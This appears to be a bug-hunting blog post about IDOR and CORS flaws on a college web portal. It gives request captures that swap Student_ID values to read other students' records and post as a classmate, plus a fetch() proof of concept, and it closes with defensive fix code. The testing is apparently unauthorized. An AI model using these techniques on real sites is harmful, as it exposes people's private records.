Hey there! It's cyberpro151 here and in today's article, I will share how I was able to hack my college's website. So let's get started.
So while surfing my college's website a few days ago, I saw an option called "My Profile". After seeing this option, I thought that I should see what request is getting sent to the server. So I immediately opened BurpSuite and clicked on "My Profile". The request looked something like the following:
Host: redacted.com
Connection: close
Content-Length: 32
sec-ch-ua: "Not A(Brand";v="99", "Brave";v="121", "Chromium";v="121"
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Sec-GPC: 1
Accept-Language: en-US,en;q=0.7
Origin: https://redacted.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: redacted.com
{"Student_ID":"MYCAMPUS2252557"}
So I thought about changing the value of my roll number from "MYCAMPUS2252557" to "MYCAMPUS2252551" to see whether the profile of roll number "551" would be shown or not. After changing the value of the "Student_ID" parameter to "MYCAMPUS2252551", I sent the request, checked my browser and BOOM! I got the data of my fellow student whose roll number was 551, along with all of his personal details.
Thus, I thought about testing some other functionalities too in the website and while surfing, I got to see an option through which we can ask questions to our teachers through the website.
So I quickly clicked on it and the interface looked something like the following:
I quickly selected the subject "Computer Science", typed a random question "a" and clicked on "Send" to see the request that was getting sent to the server. The request looked something like the following:
POST /api/Mobile/send_questionEx HTTP/1.1
Host: redacted.com
Connection: close
Content-Length: 388
sec-ch-ua: "Not A(Brand";v="99", "Brave";v="121", "Chromium";v="121"
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Sec-GPC: 1
Accept-Language: en-US,en;q=0.7
Origin: https://redacted.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://redacted.com/
{"device_Id":"MYCAMPUS2252557010064645373612100053736","application_Version":"1.4.8","Student_ID":"MYCAMPUS2252557","Teacher_ID":"e6d52f91-b403-4016-a1c9-5efc55b1ee6a","Question":"a","userMacAddress":"dsdd","Subject_ID":"1a767865-b9f3-4800-bb0f-52409e13d97f","Section_ID":"75d05cec-ffa0-44ab-b995-b2db59985afd","From":"Muhammad Bilal Ashraf","Topic":null,"application_Name":"REDACTED"}
Now in this request, I changed the value of the parameter "Student_ID" from "MYCAMPUS2252557" to "MYCAMPUS2252574" and clicked on Send in BurpSuite. When I went to the browser and clicked on the "History" of questions to see if any question "a" was present, to my surprise there wasn't any question with the value "a". I immediately called my fellow student with roll number "74" and asked him to check whether there was any question with the value "a" in the history of his account, and he was also surprised to see that the question had been sent from his account.
After finding two bugs, I investigated further and found the following link by fuzzing:
https://redacted.com/selectCMS
I opened this link and saw the following interface:
I clicked on Exam Results, again intercepted the request, and the request looked something like the following:
POST /api/Mobile/StudentPortalGetAllExamsResult HTTP/1.1
Host: redacted.com
Connection: close
Content-Length: 32
sec-ch-ua: "Not A(Brand";v="99", "Brave";v="121", "Chromium";v="121"
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Sec-GPC: 1
Accept-Language: en-US,en;q=0.7
Origin: https://redacted.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://redacted.com/
{"Student_ID":"MYCAMPUS2252557"}
I changed the value of the parameter "Student_ID" to "MYCAMPUS2252551", clicked on "Send" in BurpSuite and I was again able to see the exam results of roll number 551. This was the third IDOR.
Then I clicked on the "Attendance" option and the following request was sent:
POST /api/Mobile/attendance_cms HTTP/1.1
Host: redacted.com
Connection: close
Content-Length: 88
sec-ch-ua: "Not A(Brand";v="99", "Brave";v="121", "Chromium";v="121"
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Sec-GPC: 1
Accept-Language: en-US,en;q=0.7
Origin: https://redacted.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://redacted.com/
{"Student_ID":"MYCAMPUS2252557","Class_Level_ID":"8931d744-acc9-4776-a03a-2b705038ea48"}
I changed the value of "Student_ID" to "MYCAMPUS2252551" and again I was able to see all the attendance details of roll number "551".
Even if these bugs had been fixed, I would still have been able to access the data of other users because of the CORS misconfigurations present on all of the endpoints. For example, if we consider the endpoint through which we can view all the past questions that we have asked, the request looked something like the following:
POST /api/Mobile/GetStudentChatWithTeacher HTTP/1.1
Host: redacted.com
Connection: close
Content-Length: 32
sec-ch-ua: "Not A(Brand";v="99", "Brave";v="121", "Chromium";v="121"
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Sec-GPC: 1
Accept-Language: en-US,en;q=0.7
Origin: https://redacted.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://redacted.com/
{"Student_ID":"MYCAMPUS2252557"}
I sent this request to Repeater and added another header, given below:
Origin: google.com
After adding this header, I sent the request and got the following response:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 14 Feb 2024 09:10:18 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Set-Cookie: sessioncookie=e895ea89047eda1aefab4471005e7af7; expires=Wed, 14-Feb-24 10:10:17 GMT; max-age=3600; domain=redacted.com
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Access-Control-Allow-Origin: *
Content-Length: 379
{"data":[{"lazyLoader":{},"questionId":"a541443c-f8c7-4e48-9087-7ca8b370f401","question":"a","date":"2023-11-01T00:11:25.521557+05:00","from":"Muhammad Bilal Ashraf","topic":"","teacherName":"Muhammad Bilal Ashraf","subject":"Computer Science","answer":"?","responsDate":"2023-11-01T12:45:11.443131+05:00","mark":true}],"message":{"text":"","title":"","messageTypeId":"Success"}}
The header "Access-Control-Allow-Origin: *" compelled me to test for a CORS misconfiguration, so I wrote some HTML and JavaScript. The code for testing the CORS misconfiguration looked something like the following:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
<script src="script.js"></script>
</head>
<body>
</body>
</html>
The code for script.js is as given below:
// script.js: cross-origin request from the test page to the college API endpoint
const url = 'https://redacted.com/api/Mobile/GetStudentChatWithTeacher';
const method = 'POST';

const headers = new Headers();
headers.append('Content-Type', 'application/json');
// Note: page scripts cannot set the real Referer header (it is a forbidden header
// name in fetch); this only adds a custom header named "Referrer", and the browser
// sets the actual Referer itself.
headers.append('Referrer', 'https://redacted.com/');

const body = JSON.stringify({
  "Student_ID": "MYCAMPUS2252557"
});

const options = {
  method,
  headers,
  body
};

fetch(url, options)
  .then(response => response.json())
  .then(data => {
    // The response body is only readable here if the server's CORS policy allows it
    console.log(data);
  })
  .catch(error => {
    // Network error or a CORS block by the browser
    console.error(error);
  });
I saved both files and opened the file "cors.html". When I navigated to the Console to see whether the question was being displayed or not, then, as expected, the question was displayed as shown below:
I then tested other endpoints too, and they were also vulnerable to CORS misconfigurations.
Thanks for reading this article, and I hope it has been helpful for all of you.
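As an added example (not the college's code or the author's), here is what closing both classes of bug looks like server-side, written in plain JavaScript with no framework: the student id is taken from the authenticated session instead of the Student_ID body parameter, and the Origin header is checked against an allowlist instead of answering with "*". The session cookie values, attendance records and origins are constructed for the example.

```javascript
'use strict';

// Constructed sample session store: sessioncookie value -> authenticated student.
const SESSIONS = new Map([
  ['sess-557', { studentId: 'MYCAMPUS2252557' }],
]);

// Constructed sample data behind the attendance endpoint.
const ATTENDANCE = {
  MYCAMPUS2252557: { present: 40, absent: 2 },
  MYCAMPUS2252551: { present: 38, absent: 4 },
};

// Only first-party origins may read responses cross-origin.
const ALLOWED_ORIGINS = new Set(['https://redacted.com']);

// IDOR fix: the identity comes from the session, never from the request body.
// A body Student_ID that differs from the session is refused and logged, because
// that is exactly the probe described in the writeup and worth alerting on.
function attendance(sessionCookie, rawBody) {
  const session = SESSIONS.get(sessionCookie);
  if (!session) return { status: 401, body: { error: 'not authenticated' } };
  let parsed;
  try {
    parsed = JSON.parse(rawBody);
  } catch (e) {
    return { status: 400, body: { error: 'invalid JSON' } };
  }
  if (parsed.Student_ID && parsed.Student_ID !== session.studentId) {
    console.warn(`IDOR probe: ${session.studentId} requested ${parsed.Student_ID}`);
    return { status: 403, body: { error: 'forbidden' } };
  }
  return { status: 200, body: ATTENDANCE[session.studentId] };
}

// CORS fix: echo only an allowlisted exact origin, never "*". Browsers refuse to
// expose a credentialed (cookie-bearing) response under "*", so a session-bound
// API must name the origin explicitly; Vary: Origin keeps caches from serving
// one origin's answer to another. An unknown origin gets no CORS headers at all.
function corsHeaders(origin) {
  if (!ALLOWED_ORIGINS.has(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}
```

With these two checks the cross-origin page from the writeup receives no Access-Control-Allow-Origin header for its origin, and even a same-origin request can only ever retrieve the logged-in student's own records.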